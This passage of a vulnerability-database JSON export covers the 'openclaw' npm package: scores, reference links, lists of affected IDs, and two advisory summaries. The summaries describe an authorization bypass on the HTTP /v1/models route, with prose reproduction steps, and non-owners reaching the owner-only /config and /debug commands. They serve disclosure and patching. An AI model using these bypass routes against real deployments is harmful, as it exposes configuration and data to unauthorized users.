ulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"V
CID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":
["CVE-2026-35643","GHSA-cxmw-p77q-wchg"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-nf6w-v1pc-mbe5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90846?format=json","vulnerability_id":"VCID-nfva-pukn-uqch","summary":"OpenClaw has a Gateway HTTP /v1/models Route Bypasses Operator Read Scope\n> Fixed in OpenClaw 2026.3.24, the current shipping release.\n\n## Summary\n\nThe OpenAI-compatible HTTP endpoint `/v1/models` accepts bearer auth but does not enforce operator method scopes.\n\nIn contrast, the WebSocket RPC path enforces `operator.read` for `models.list`.\n\nA caller connected with `operator.approvals` (no read scope) is rejected for `models.list` (`missing scope: operator.read`) but can still enumerate model metadata through HTTP `/v1/models`.\n\nConfirmed on current `main` at commit `06de515b6c42816b62ec752e1c221cab67b38501`.\n\n## Details\n\nThe WS control-plane path enforces role/scope checks centrally before dispatching methods. For non-admin operators, this includes required method scopes such as `operator.read` for `models.list`.\n\nThe HTTP compatibility path for `/v1/models` performs bearer authorization and then returns model metadata; it does not apply an equivalent scope check.\n\nAs reproduced, a caller with only `operator.approvals` can:\n\n1. connect successfully,\n2. fail `models.list` over WS with `missing scope: operator.read`,\n3. 
fetch `/v1/models` over HTTP with status 200 and model data.\n\nThis is a cross-surface authorization inconsistency where the stricter WS policy can be bypassed via HTTP.\n\n## Impact\n\n- Callers lacking `operator.read` can still enumerate gateway model metadata through HTTP compatibility routes.\n- Breaks scope model consistency between WS RPC and HTTP surfaces.\n- Weakens least-privilege expectations for operators granted non-read scopes.\n\n## Patch Suggestion\n\n### 1) Enforce read scope on `/v1/models` routes\n\nApply a scope gate equivalent to `models.list` before serving `/v1/models` or `/v1/models/:id`.\n\n### 2) Reuse centralized scope-authorization helper for HTTP compatibility endpoints\n\nUse the same operator scope logic used by WS dispatch (`authorizeOperatorScopesForMethod(...)`) to prevent policy drift.\n\n### 3) Add regression tests\n\nKeep this PoC and add explicit negative/positive controls:\n\n- `operator.approvals` without read is rejected on HTTP `/v1/models`.\n- `operator.read` is accepted on both WS `models.list` and HTTP `/v1/models`.\n\n## Credit\n\nReported by 
@zpbrent.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35619","reference_id":"","reference_type":"","scores":[{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.11019","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.10977","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00036","scoring_system":"epss","scoring_elements":"0.11011","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35619"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/06de515b6c42816b62ec752e1c221cab67b38501","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T18:05:44Z/"}],"url":"https://github.com/openclaw/openclaw/commit/06de515b6c42816b62ec752e1c221cab67b38501"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-68f8-9mhj-h2mp","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","sco
ring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T18:05:44Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-68f8-9mhj-h2mp"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35619","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35619"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-authorization-bypass-via-http-v1-models-endpoint","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T18:05:44Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-authorization-bypass-via-http-v1-models-endpoint"},{"reference_url":"https://github.com/advisories/GHSA-68f8-9mhj-h2mp","reference_id":"GHSA-68f8-9mhj-h2mp","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-68f8-9mhj-h2mp"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110567?format=json","purl":"pkg:npm/
openclaw@2026.3.24","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5dj5-mk23-kyds"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-66nc-bn98-nbas"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulner
ability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-acy1-83py-efhr"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulner
ability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulner
ability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-utv2-tyje-kfht"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vv2u-u7mn-rfe1"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulner
ability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.24"}],"aliases":["CVE-2026-35619","GHSA-68f8-9mhj-h2mp"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-nfva-pukn-uqch"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91080?format=json","vulnerability_id":"VCID-njsr-j7vm-cqg8","summary":"OpenClaw: Command-authorized non-owners could reach owner-only `/config` and `/debug` surfaces\n### Summary\n\nOpenClaw documented `/config` and `/debug` as owner-only commands, but the command handlers checked only whether the sender was command-authorized. A lower-trust sender who was intentionally allowed to run commands could still reach privileged configuration and debugging surfaces.\n\n### Impact\n\nThis allowed a non-owner sender to read or change privileged configuration that should have remained restricted to owners.\n\n### Affected versions\n\n`openclaw` `<= 2026.3.11`\n\n### Patch\n\nFixed in `openclaw` `2026.3.12`. 
Owner checks are now enforced for privileged command surfaces, and regression tests cover `/config` and `/debug` access control.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/08aa57a3de37d337b226ae861f573779f112ff2e","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/08aa57a3de37d337b226ae861f573779f112ff2e"},{"reference_url":"https://github.com/openclaw/openclaw/pull/44305","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/44305"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.12","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.12"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-r7vr-gr74-94p8","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_s
ystem":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-r7vr-gr74-94p8"},{"reference_url":"https://github.com/advisories/GHSA-r7vr-gr74-94p8","reference_id":"GHSA-r7vr-gr74-94p8","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-r7vr-gr74-94p8"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/112780?format=json","purl":"pkg:npm/openclaw@2026.3.12","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"
VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8ae